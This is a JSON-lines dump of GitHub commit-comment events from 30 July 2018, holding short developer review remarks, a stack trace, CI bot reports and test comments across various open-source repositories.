{"id":"8036362465","type":"CommitCommentEvent","actor":{"login":"waterlgndx"},"repo":{"name":"waterlgndx/ThatShouldBeAComic"},"payload":{"comment":{"id":29883126,"position":93,"line":93,"path":"beta/Classes/Image.php","commit_id":"beaa12a7a3da9637f1af2d8b42313a14e55b146a","created_at":"2018-07-30T08:54:14Z","updated_at":"2018-07-30T08:54:14Z","author_association":"OWNER","body":"Note to self:php doesn't support ? Operator"}},"created_at":"2018-07-30T08:54:14Z"}
{"id":"8036365659","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29883156,"position":null,"line":null,"path":null,"commit_id":"a909282ebf78882879d98db5ea07bca76c3541a8","created_at":"2018-07-30T08:54:52Z","updated_at":"2018-07-30T08:54:52Z","author_association":"NONE","body":"Maybe it makes sense to test as a simplification and test whether it improves play against weaker opponents."}},"created_at":"2018-07-30T08:54:52Z"}
{"id":"8036366211","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29883163,"position":null,"line":null,"path":null,"commit_id":"a909282ebf78882879d98db5ea07bca76c3541a8","created_at":"2018-07-30T08:54:58Z","updated_at":"2018-07-30T08:54:58Z","author_association":"NONE","body":"Interesting idea and explanation.\r\nThe test seems to indicate that this neutral.\r\n\r\nBut perhaps it could work like a \"contempt\" against weaker engines.\r\nIn a sharp but drawable position escpecially a weaker opponent has more possibilities to make weak moves then in a dry position.\r\n\r\nSo i would test for comparison master and your patch against SF 7."}},"created_at":"2018-07-30T08:54:58Z"}
{"id":"8036366504","type":"CommitCommentEvent","actor":{"login":"ganfra"},"repo":{"name":"vector-im/riot-android"},"payload":{"comment":{"id":29883166,"position":4,"line":804,"path":"vector/src/main/java/im/vector/activity/VectorRoomActivity.java","commit_id":"0b402d7d6a39a6d2452e652c13f92db94c58101a","created_at":"2018-07-30T08:55:01Z","updated_at":"2018-07-30T08:55:01Z","author_association":"CONTRIBUTOR","body":"The init should not be done each time. See my comment on constants so you don't need to init yourself all commands"}},"created_at":"2018-07-30T08:55:01Z"}
{"id":"8036366787","type":"CommitCommentEvent","actor":{"login":"waterlgndx"},"repo":{"name":"waterlgndx/ThatShouldBeAComic"},"payload":{"comment":{"id":29883171,"position":70,"line":70,"path":"beta/Classes/Image.php","commit_id":"beaa12a7a3da9637f1af2d8b42313a14e55b146a","created_at":"2018-07-30T08:55:05Z","updated_at":"2018-07-30T08:55:05Z","author_association":"OWNER","body":"Not supported in php"}},"created_at":"2018-07-30T08:55:05Z"}
{"id":"8036369157","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29883188,"position":null,"line":null,"path":null,"commit_id":"14b5d5e93e85291ed07308e2274ba0d5c487472f","created_at":"2018-07-30T08:55:31Z","updated_at":"2018-07-30T08:55:31Z","author_association":"MEMBER","body":":tada: "}},"created_at":"2018-07-30T08:55:31Z"}
{"id":"8036369818","type":"CommitCommentEvent","actor":{"login":"RemoteWeatherStation"},"repo":{"name":"RemoteWeatherStation/Remote-Weather-Station"},"payload":{"comment":{"id":29883196,"position":1,"line":121,"path":"A-Temperature_logger.ino","commit_id":"dcf8f03bf15932edb7c4fcf96ea67f97c58831f2","created_at":"2018-07-30T08:55:39Z","updated_at":"2018-07-30T08:55:39Z","author_association":"OWNER","body":"This similar to the light sleep program but it is modem sleep instead of light sleep."}},"created_at":"2018-07-30T08:55:39Z"}
{"id":"8036370847","type":"CommitCommentEvent","actor":{"login":"mreis1"},"repo":{"name":"xdenser/node-firebird-libfbclient"},"payload":{"comment":{"id":29883202,"position":null,"line":null,"path":null,"commit_id":"d4a61ac37823d2242e193897b556e4378b30ab03","created_at":"2018-07-30T08:55:52Z","updated_at":"2018-07-30T08:55:52Z","author_association":"NONE","body":"Just tried this commit and the segfault still occurs: \r\n```\r\nFATAL ERROR: v8::ToLocalChecked Empty MaybeLocal.\r\n 1: node::Abort() [/usr/local/bin/node]\r\n 2: node::FatalException(v8::Isolate*, v8::Local<v8::Value>, v8::Local<v8::Message>) [/usr/local/bin/node]\r\n 3: v8::V8::ToLocalEmpty() [/usr/local/bin/node]\r\n 4: Connection::NewBlobSync(Nan::FunctionCallbackInfo<v8::Value> const&) [/Users/marcio/Dev/heitz-ws/node_modules/firebird/build/Release/binding.node]\r\n 5: Nan::imp::FunctionCallbackWrapper(v8::FunctionCallbackInfo<v8::Value> const&) [/Users/marcio/Dev/heitz-ws/node_modules/firebird/build/Release/binding.node]\r\n 6: v8::internal::FunctionCallbackArguments::Call(void (*)(v8::FunctionCallbackInfo<v8::Value> const&)) [/usr/local/bin/node]\r\n 7: v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<false>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments) [/usr/local/bin/node]\r\n 8: v8::internal::Builtin_Impl_HandleApiCall(v8::internal::BuiltinArguments, v8::internal::Isolate*) [/usr/local/bin/node]\r\n 9: 0x20988d38463d\r\n```"}},"created_at":"2018-07-30T08:55:52Z"}
{"id":"8036377287","type":"CommitCommentEvent","actor":{"login":"damakin"},"repo":{"name":"damakin/skyeng-tasks"},"payload":{"comment":{"id":29883228,"position":63,"line":63,"path":"DecoratorManager.php","commit_id":"9e5baa1ff5443658be757dc65dda70c46b4ad568","created_at":"2018-07-30T08:57:05Z","updated_at":"2018-07-30T08:57:05Z","author_association":"OWNER","body":"Кэш может перезатереть чужие ключи. Как вариант - использовать префикс."}},"created_at":"2018-07-30T08:57:05Z"}
{"id":"8036381454","type":"CommitCommentEvent","actor":{"login":"Mic92"},"repo":{"name":"awslabs/aws-sam-cli"},"payload":{"comment":{"id":29883273,"position":5,"line":8,"path":"requirements/base.txt","commit_id":"48bdade069f88ef08cbc0adebef2d3a78ec2dba9","created_at":"2018-07-30T08:57:51Z","updated_at":"2018-07-30T08:57:51Z","author_association":"NONE","body":"@jfuss would newer versions of aws-sam-translator work as well? (context: https://github.com/NixOS/nixpkgs/pull/44219). cc @andreabedini "}},"created_at":"2018-07-30T08:57:51Z"}
{"id":"8036384461","type":"CommitCommentEvent","actor":{"login":"MrMontag"},"repo":{"name":"GAMS-dev/studio"},"payload":{"comment":{"id":29883286,"position":9,"line":95,"path":"src/lxiviewer/lxiviewer.cpp","commit_id":"fb76627ea610c50faf4e821d1c81904b54b06a8f","created_at":"2018-07-30T08:58:26Z","updated_at":"2018-07-30T08:58:26Z","author_association":"MEMBER","body":"@Jazzco @ClemensGAMS @LutzWestermann I think this line is the cause of our problem. To avoid the raise of an already opened LxiViewer if \"do not open LXI\" is set in settings. Why do we have to call open?"}},"created_at":"2018-07-30T08:58:26Z"}
{"id":"8036388643","type":"CommitCommentEvent","actor":{"login":"daixuyang"},"repo":{"name":"daixuyang/sendEmail"},"payload":{"comment":{"id":29883339,"position":4,"line":112,"path":"src/main/java/main/SendEmail.java","commit_id":"71c6c81c71a6a72253f62e66fc1072174e4ab4c8","created_at":"2018-07-30T08:59:13Z","updated_at":"2018-07-30T08:59:13Z","author_association":"OWNER","body":"呵呵"}},"created_at":"2018-07-30T08:59:13Z"}
{"id":"8036389654","type":"CommitCommentEvent","actor":{"login":"Ingvord"},"repo":{"name":"tango-controls/JTango"},"payload":{"comment":{"id":29883351,"position":5,"line":35,"path":"server/src/main/resources/logback.xml","commit_id":"51514e9fc95200d38e74b3228d8725aba38a0cc3","created_at":"2018-07-30T08:59:24Z","updated_at":"2018-07-30T08:59:24Z","author_association":"MEMBER","body":"Maybe we should remove this logback configuration from the library? Most of the time user wants to override these settings. Sometimes (if not always) library will prefer configuration from the library i.e. this file not the user's. This configuration may be overridden if the other one is explicitly set via cmd line parameter, but that is not always convenient and misleading."}},"created_at":"2018-07-30T08:59:24Z"}
{"id":"8036389771","type":"CommitCommentEvent","actor":{"login":"thymikee"},"repo":{"name":"thymikee/jest-preset-angular"},"payload":{"comment":{"id":29883353,"position":null,"line":null,"path":null,"commit_id":"bc6c523c7b891a7d7143626e34970a8223f99a83","created_at":"2018-07-30T08:59:26Z","updated_at":"2018-07-30T08:59:26Z","author_association":"OWNER","body":"check out `6.0.0-rc.0` or `next` tag"}},"created_at":"2018-07-30T08:59:26Z"}
{"id":"8036390636","type":"CommitCommentEvent","actor":{"login":"SivakrishnanGopalan"},"repo":{"name":"SivakrishnanGopalan/mcxCrawler"},"payload":{"comment":{"id":29883363,"position":null,"line":null,"path":null,"commit_id":"54cb8a4393ee0b3b2ae1d9f8f64d61fc991702ce","created_at":"2018-07-30T08:59:37Z","updated_at":"2018-07-30T08:59:37Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-30T08:59:37Z"}
{"id":"8036391102","type":"CommitCommentEvent","actor":{"login":"SivakrishnanGopalan"},"repo":{"name":"SivakrishnanGopalan/mcxCrawler"},"payload":{"comment":{"id":29883369,"position":null,"line":null,"path":null,"commit_id":"54cb8a4393ee0b3b2ae1d9f8f64d61fc991702ce","created_at":"2018-07-30T08:59:42Z","updated_at":"2018-07-30T08:59:42Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-30T08:59:42Z"}
{"id":"8036391360","type":"CommitCommentEvent","actor":{"login":"daixuyang"},"repo":{"name":"daixuyang/sendEmail"},"payload":{"comment":{"id":29883372,"position":4,"line":112,"path":"src/main/java/main/SendEmail.java","commit_id":"71c6c81c71a6a72253f62e66fc1072174e4ab4c8","created_at":"2018-07-30T08:59:45Z","updated_at":"2018-07-30T08:59:45Z","author_association":"OWNER","body":"没有用"}},"created_at":"2018-07-30T08:59:45Z"}
{"id":"8036403766","type":"CommitCommentEvent","actor":{"login":"Vampire"},"repo":{"name":"Discord4J/Discord4J"},"payload":{"comment":{"id":29883443,"position":9,"line":175,"path":"build.gradle","commit_id":"94fe39be24f7c53a34bfdc13529fe3e4473c2382","created_at":"2018-07-30T09:02:04Z","updated_at":"2018-07-30T09:02:04Z","author_association":"NONE","body":"Well, the task would not fail.\r\nIt would still write that URL into the properties file, while Gradle would know better.\r\nCould be, that after that the wrapper would not work anymore.\r\n\r\nOf course `distributionType=ALL` respects the version.\r\nThe `distributionUrl` setting is only meant if you use your own custom Gradle distribution from your own URL.\r\nAs long as you use the official Gradle distributions, you just have to specify `gradleVersion` and `distributionType` and it constructs the correct URL.\r\nBoth can be given in the build script, or as command-line parameters.\r\nIf `gradleVersion` is not set, it defaults to the version executing the build, if `distributionType` is not set it defaults to `bin` which is sufficient to run the build, it might just be a bit more comfortable to develop the build with `all`. During normal running of the build, `all` actually only wastes diskspace. :-)\r\n\r\nBecause of these facts, I'd suggest to (if you want to keep `all`) only configure `all` in the build script and either give the version on the commandline when upgrading, or if you don't want to remember the commandline parameter, increase the verision in the distribution URL in `gradle-wrapper.properties` directly before running the wrapper task. This will have the added benefit that the wrapper files are taken from the new version in case they changed between releases.\r\n\r\nJust a suggestion though of course. :-)"}},"created_at":"2018-07-30T09:02:04Z"}
{"id":"8036407535","type":"CommitCommentEvent","actor":{"login":"onlinesnic"},"repo":{"name":"yTakkar/Instagram-clone"},"payload":{"comment":{"id":29883476,"position":null,"line":null,"path":null,"commit_id":"ed9646fc77cf69749e03c4ad30f128d5793baee7","created_at":"2018-07-30T09:02:46Z","updated_at":"2018-07-30T09:02:46Z","author_association":"NONE","body":"No admin control panel?"}},"created_at":"2018-07-30T09:02:46Z"}
{"id":"8036414988","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29883517,"position":null,"line":null,"path":null,"commit_id":"0c4ba9385ead955a7015649e25af0de84ba97553","created_at":"2018-07-30T09:04:17Z","updated_at":"2018-07-30T09:04:17Z","author_association":"OWNER","body":"One problem which could also arise is the dependency on the minimum score. This could be solved by using something like A*exp(maxScore - thread score), which would use maximum score as a reference."}},"created_at":"2018-07-30T09:04:17Z"}
{"id":"8036417052","type":"CommitCommentEvent","actor":{"login":"jims10d"},"repo":{"name":"jims10d/sportman-loopback"},"payload":{"comment":{"id":29883520,"position":null,"line":null,"path":null,"commit_id":"11e68934453c84103f6c6b4cac0d450cc864efa0","created_at":"2018-07-30T09:04:43Z","updated_at":"2018-07-30T09:04:43Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/5a7e57bc-5410-437d-95a5-d427815f5ebc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/db4be768-68e6-447f-9187-7d1ee9f620cc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\") deployed [sportman-loopback](https://github.com/jims10d/sportman-loopback/releases/tag/deploy-ibm-yp-us-south-jims10d-simpleSpace-20180730-090442 \"deploy-ibm-yp-us-south-jims10d-simpleSpace-20180730-090442\") to [simpleSpace](https://console.bluemix.net/apps/12384bdb-7ac1-45d2-b63b-7d0a3532c568?env_id=ibm:yp:us-south \"ibm:yp:us-south:jims10d:simpleSpace\"), including this commit"}},"created_at":"2018-07-30T09:04:43Z"}
{"id":"8036428615","type":"CommitCommentEvent","actor":{"login":"Ingvord"},"repo":{"name":"tango-controls/JTango"},"payload":{"comment":{"id":29883537,"position":null,"line":null,"path":null,"commit_id":"7221a91c3a6a737b3c5ac78f5dafa1416b1a9784","created_at":"2018-07-30T09:07:04Z","updated_at":"2018-07-30T09:07:04Z","author_association":"MEMBER","body":"I would remove DevFailedUtils.throwDevFailed from the library at all. Should I?"}},"created_at":"2018-07-30T09:07:04Z"}
{"id":"8036429352","type":"CommitCommentEvent","actor":{"login":"RemoteWeatherStation"},"repo":{"name":"RemoteWeatherStation/Remote-Weather-Station"},"payload":{"comment":{"id":29883538,"position":1,"line":50,"path":"A-Temperature_logger.ino","commit_id":"37178c2557926f984ba67f3552152d793bbecb36","created_at":"2018-07-30T09:07:13Z","updated_at":"2018-07-30T09:07:13Z","author_association":"OWNER","body":"This is a delay program. Every ten seconds it takes a reading and the BME280 is in low power."}},"created_at":"2018-07-30T09:07:13Z"}
{"id":"8036430352","type":"CommitCommentEvent","actor":{"login":"fazo96"},"repo":{"name":"ChluNetwork/chlu-ipfs-support"},"payload":{"comment":{"id":29883541,"position":8,"line":206,"path":"src/modules/reviewrecords.js","commit_id":"b384fb49bf05fe47bdd4d3fb056ef5f646513c66","created_at":"2018-07-30T09:07:26Z","updated_at":"2018-07-30T09:07:26Z","author_association":"COLLABORATOR","body":"That is a good question. The whole pubsub part to request pins could be reworked to just listening to orbit-db updates, I'm not sure if we should do that though"}},"created_at":"2018-07-30T09:07:26Z"}
{"id":"8036435564","type":"CommitCommentEvent","actor":{"login":"SamPoulton"},"repo":{"name":"SamPoulton/Explode"},"payload":{"comment":{"id":29883545,"position":null,"line":null,"path":null,"commit_id":"0e6a72a49e457bea6999766aaefc70ae0e11a0bb","created_at":"2018-07-30T09:08:29Z","updated_at":"2018-07-30T09:08:29Z","author_association":"OWNER","body":"Issue #2, not \\#1"}},"created_at":"2018-07-30T09:08:29Z"}
{"id":"8036447038","type":"CommitCommentEvent","actor":{"login":"danwood76"},"repo":{"name":"danwood76/android_device_samsung_a3xeltexx"},"payload":{"comment":{"id":29883628,"position":300,"line":43,"path":"hardware/power/Power.h","commit_id":"aea5b984660ef01c3b7d8bce9580476c511cf6c3","created_at":"2018-07-30T09:10:47Z","updated_at":"2018-07-30T09:10:47Z","author_association":"OWNER","body":"Yes I was thinking the same thing."}},"created_at":"2018-07-30T09:10:47Z"}
{"id":"8036448561","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29883658,"position":null,"line":null,"path":null,"commit_id":"a909282ebf78882879d98db5ea07bca76c3541a8","created_at":"2018-07-30T09:11:04Z","updated_at":"2018-07-30T09:11:04Z","author_association":"NONE","body":"Perhaps we can factor in directly the contempt to dynamically change the bound:\r\n```\r\nint margin = ((eg > 0) - (eg < 0)) * eg_value(pos.this_thread()->contempt);\r\nint v = ((eg > 0) - (eg < 0)) * std::max(complexity, -abs(eg) - margin);\r\n```"}},"created_at":"2018-07-30T09:11:04Z"}
{"id":"8036454936","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29883734,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-30T09:12:20Z","updated_at":"2018-07-30T09:12:20Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T09:12:20Z"}
{"id":"8036464631","type":"CommitCommentEvent","actor":{"login":"Meershoaib"},"repo":{"name":"Mumtaz12/special"},"payload":{"comment":{"id":29883778,"position":null,"line":null,"path":null,"commit_id":"1c7469d982f5dcfbda526be33f92b2363db5b6aa","created_at":"2018-07-30T09:14:11Z","updated_at":"2018-07-30T09:14:11Z","author_association":"NONE","body":"Good mumtaz"}},"created_at":"2018-07-30T09:14:11Z"}
{"id":"8036469549","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29883787,"position":null,"line":null,"path":null,"commit_id":"a909282ebf78882879d98db5ea07bca76c3541a8","created_at":"2018-07-30T09:15:08Z","updated_at":"2018-07-30T09:15:08Z","author_association":"OWNER","body":"Yes, interesting ideas, please feel free to experiment as you wish and test against SF7.\r\nI have to run for now."}},"created_at":"2018-07-30T09:15:08Z"}
{"id":"8036474320","type":"CommitCommentEvent","actor":{"login":"Davidde94"},"repo":{"name":"StealthPad/Wolverine"},"payload":{"comment":{"id":29883804,"position":18,"line":60,"path":"Tests/WolverineTests/PropertyCodableRequestTests.swift","commit_id":"87cd15b98ae12453a3be3df93473135df230d6d9","created_at":"2018-07-30T09:16:01Z","updated_at":"2018-07-30T09:16:01Z","author_association":"CONTRIBUTOR","body":"If it doesn't exist and you force unwrap then the tests crash and the entire process stops (literally not other test will run). This way the other tests can continue, which will be extremely useful when we're using a CI service."}},"created_at":"2018-07-30T09:16:01Z"}
{"id":"8036475486","type":"CommitCommentEvent","actor":{"login":"tendomatGitHub"},"repo":{"name":"openmrs/openmrs-module-idgen"},"payload":{"comment":{"id":29883806,"position":4,"line":31,"path":"api/src/main/resources/IdentifierSource.hbm.xml","commit_id":"9876216ebc8152c209fb2509cebc949dc577eebe","created_at":"2018-07-30T09:16:15Z","updated_at":"2018-07-30T09:16:15Z","author_association":"NONE","body":"@djazayeri  does \"via direct SQL queries...\" include HQL Queries and if not is it better still Hibernate Native SQL or rather RAW SQL via JDBC ?"}},"created_at":"2018-07-30T09:16:15Z"}
{"id":"8036480555","type":"CommitCommentEvent","actor":{"login":"ForserX"},"repo":{"name":"tsmp/tsmp_project"},"payload":{"comment":{"id":29883817,"position":30,"line":217,"path":"xrGame/Inventory.cpp","commit_id":"14d66bc676c86f0e6f271a724cbbf27c8e28660a","created_at":"2018-07-30T09:17:14Z","updated_at":"2018-07-30T09:17:14Z","author_association":"NONE","body":"Есть макроссы __FILE__ и __LINE__"}},"created_at":"2018-07-30T09:17:14Z"}
{"id":"8036483632","type":"CommitCommentEvent","actor":{"login":"pamuripriyanka"},"repo":{"name":"pamuripriyanka/priyanka"},"payload":{"comment":{"id":29883821,"position":null,"line":null,"path":null,"commit_id":"2ee8619cbf257739e667474f98c710f3dd9a88d8","created_at":"2018-07-30T09:17:49Z","updated_at":"2018-07-30T09:17:49Z","author_association":"OWNER","body":"no comment"}},"created_at":"2018-07-30T09:17:49Z"}
{"id":"8036487545","type":"CommitCommentEvent","actor":{"login":"dr-j"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29883830,"position":5,"line":5,"path":"sql/updates/world/3.3.5/2018_07_29_00_world_335.sql","commit_id":"08c079eb3a668ff8f05762947554a416449c5876","created_at":"2018-07-30T09:18:33Z","updated_at":"2018-07-30T09:18:33Z","author_association":"CONTRIBUTOR","body":"Ignore it it was a phone in pocket job and that got posted"}},"created_at":"2018-07-30T09:18:33Z"}
{"id":"8036487662","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29883831,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-30T09:18:35Z","updated_at":"2018-07-30T09:18:35Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T09:18:35Z"}
{"id":"8036487694","type":"CommitCommentEvent","actor":{"login":"jeonghwan-kim"},"repo":{"name":"FEDevelopers/tech.description"},"payload":{"comment":{"id":29883832,"position":null,"line":null,"path":null,"commit_id":"59cba249f161cd54dd10e7c5a37c2e641c9048b1","created_at":"2018-07-30T09:18:35Z","updated_at":"2018-07-30T09:18:35Z","author_association":"MEMBER","body":"아예 호스팅을 해 볼까요?  @apple77y "}},"created_at":"2018-07-30T09:18:35Z"}
{"id":"8036489681","type":"CommitCommentEvent","actor":{"login":"RyanMKrol"},"repo":{"name":"StealthPad/Wolverine"},"payload":{"comment":{"id":29883842,"position":18,"line":60,"path":"Tests/WolverineTests/PropertyCodableRequestTests.swift","commit_id":"87cd15b98ae12453a3be3df93473135df230d6d9","created_at":"2018-07-30T09:18:57Z","updated_at":"2018-07-30T09:18:57Z","author_association":"NONE","body":"Can you not just optional unwrap it?"}},"created_at":"2018-07-30T09:18:57Z"}
{"id":"8036498171","type":"CommitCommentEvent","actor":{"login":"yTakkar"},"repo":{"name":"yTakkar/Instagram-clone"},"payload":{"comment":{"id":29883861,"position":null,"line":null,"path":null,"commit_id":"ed9646fc77cf69749e03c4ad30f128d5793baee7","created_at":"2018-07-30T09:20:36Z","updated_at":"2018-07-30T09:20:36Z","author_association":"OWNER","body":"@onlinesnic, there's no admin panel in this project"}},"created_at":"2018-07-30T09:20:36Z"}
{"id":"8036500679","type":"CommitCommentEvent","actor":{"login":"Stunkymonkey"},"repo":{"name":"syncthing/syncthing-gtk"},"payload":{"comment":{"id":29883867,"position":241,"line":255,"path":"syncthing_gtk/notifications.py","commit_id":"1afa010dd98d799cb0270a6ecc1d7e6d4241125e","created_at":"2018-07-30T09:21:03Z","updated_at":"2018-07-30T09:21:03Z","author_association":"NONE","body":"maybe [format-link](https://docs.python.org/3.4/library/string.html#format-examples)?"}},"created_at":"2018-07-30T09:21:03Z"}
{"id":"8036509192","type":"CommitCommentEvent","actor":{"login":"danielarnason"},"repo":{"name":"regiongis/python_helpers"},"payload":{"comment":{"id":29883878,"position":null,"line":null,"path":null,"commit_id":"7e41d135180e1eb9047b67ec21b9738d12664653","created_at":"2018-07-30T09:22:39Z","updated_at":"2018-07-30T09:22:39Z","author_association":"CONTRIBUTOR","body":"@baffioso Har lavet en metode, der kan importere en dataframe ind i SQL databasen igen. Classen laver en engine i init metoden, som den så bruger i de andre metoder.\r\n\r\nEr det en ok måde at gøre det på?"}},"created_at":"2018-07-30T09:22:39Z"}
{"id":"8036546336","type":"CommitCommentEvent","actor":{"login":"caugner"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29883966,"position":5,"line":3793,"path":"config/locales/server.en.yml","commit_id":"159266ae6678c979c460019277782218dda3ea7d","created_at":"2018-07-30T09:29:40Z","updated_at":"2018-07-30T09:29:40Z","author_association":"CONTRIBUTOR","body":"@udan11 This mentions a \"developer email\". Is this intentional? Shouldn't it be \"administrator email\"?!"}},"created_at":"2018-07-30T09:29:40Z"}
{"id":"8036550331","type":"CommitCommentEvent","actor":{"login":"81Denton"},"repo":{"name":"tgstation/tgstation"},"payload":{"comment":{"id":29883975,"position":4,"line":20,"path":"code/modules/cargo/bounties/mech.dm","commit_id":"f75e5d7b689a87890bc44896109d584c289047fd","created_at":"2018-07-30T09:30:25Z","updated_at":"2018-07-30T09:30:25Z","author_association":"CONTRIBUTOR","body":"Ah, I get what you mean now."}},"created_at":"2018-07-30T09:30:25Z"}
{"id":"8036552428","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-theme-deepfish"},"payload":{"comment":{"id":29883983,"position":50,"line":50,"path":"app/code/DeepFish/CatalogSearch/Plugin/Model/Autocomplete/DataProvider.php","commit_id":"0fde2002057fbd5e88782042a987f471e2e0f3a6","created_at":"2018-07-30T09:30:48Z","updated_at":"2018-07-30T09:30:48Z","author_association":"OWNER","body":"Need empty line between methods"}},"created_at":"2018-07-30T09:30:48Z"}
{"id":"8036553643","type":"CommitCommentEvent","actor":{"login":"codacy-bot"},"repo":{"name":"Phyrone/ConfigLib"},"payload":{"comment":{"id":29883985,"position":null,"line":null,"path":null,"commit_id":"60093d6a70e4714d476873eb9e1d62aed619c192","created_at":"2018-07-30T09:31:02Z","updated_at":"2018-07-30T09:31:02Z","author_association":"NONE","body":"### [Codacy](https://app.codacy.com/app/Phyrone/ConfigLib/commit?cid=229346281) detected an issue:\n#### Message: `Avoid reassigning parameters such as 'toParse'`\n\n    \n#### Occurred on:\n+ **Commit**:  60093d6a70e4714d476873eb9e1d62aed619c192\n+ **File**:    [src/main/java/de/phyrone/configlib/ConfigLoader.java](https://github.com/Phyrone/ConfigLib/blob/60093d6a70e4714d476873eb9e1d62aed619c192/src/main/java/de/phyrone/configlib/ConfigLoader.java)\n+ **LineNum**: [23](https://github.com/Phyrone/ConfigLib/blob/60093d6a70e4714d476873eb9e1d62aed619c192/src/main/java/de/phyrone/configlib/ConfigLoader.java#L23)\n+ **Code**:    `public T fromString(String toParse) {`\n\n    \n#### Currently on:\n+ **Commit**:  60093d6a70e4714d476873eb9e1d62aed619c192\n+ **File**:    [src/main/java/de/phyrone/configlib/ConfigLoader.java](https://github.com/Phyrone/ConfigLib/blob/60093d6a70e4714d476873eb9e1d62aed619c192/src/main/java/de/phyrone/configlib/ConfigLoader.java)\n+ **LineNum**: [23](https://github.com/Phyrone/ConfigLib/blob/60093d6a70e4714d476873eb9e1d62aed619c192/src/main/java/de/phyrone/configlib/ConfigLoader.java#L23)\n    "}},"created_at":"2018-07-30T09:31:02Z"}
{"id":"8036560578","type":"CommitCommentEvent","actor":{"login":"000test"},"repo":{"name":"000test/test_slackbot"},"payload":{"comment":{"id":29883995,"position":null,"line":null,"path":null,"commit_id":"59397659a50d1f2eeb9d0484effb68d8d783855d","created_at":"2018-07-30T09:32:21Z","updated_at":"2018-07-30T09:32:21Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-30T09:32:21Z"}
{"id":"8036567033","type":"CommitCommentEvent","actor":{"login":"Drapegnik"},"repo":{"name":"babajka/babajka-markup"},"payload":{"comment":{"id":29884010,"position":null,"line":null,"path":null,"commit_id":"227b729b4f4cf4c99857a76dd98847b2ab50b4ec","created_at":"2018-07-30T09:33:34Z","updated_at":"2018-07-30T09:33:34Z","author_association":"MEMBER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [add semantic-release & commit-lint](https://trello.com/c/ha9MGzjq/259-add-semantic-release-commit-lint)"}},"created_at":"2018-07-30T09:33:34Z"}
{"id":"8036567865","type":"CommitCommentEvent","actor":{"login":"Drapegnik"},"repo":{"name":"babajka/babajka-markup"},"payload":{"comment":{"id":29884014,"position":null,"line":null,"path":null,"commit_id":"4d9d31ed6f3defb1c219c78dc982ab99efbde346","created_at":"2018-07-30T09:33:43Z","updated_at":"2018-07-30T09:33:43Z","author_association":"MEMBER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [add semantic-release & commit-lint](https://trello.com/c/ha9MGzjq/259-add-semantic-release-commit-lint)"}},"created_at":"2018-07-30T09:33:43Z"}
{"id":"8036569720","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29884017,"position":32,"line":872,"path":"fabfile.py","commit_id":"e1949754fa249ef89cb42d6e4bbb6ddb4798fb3a","created_at":"2018-07-30T09:34:06Z","updated_at":"2018-07-30T09:34:06Z","author_association":"CONTRIBUTOR","body":"please add a docstring for tasks"}},"created_at":"2018-07-30T09:34:06Z"}
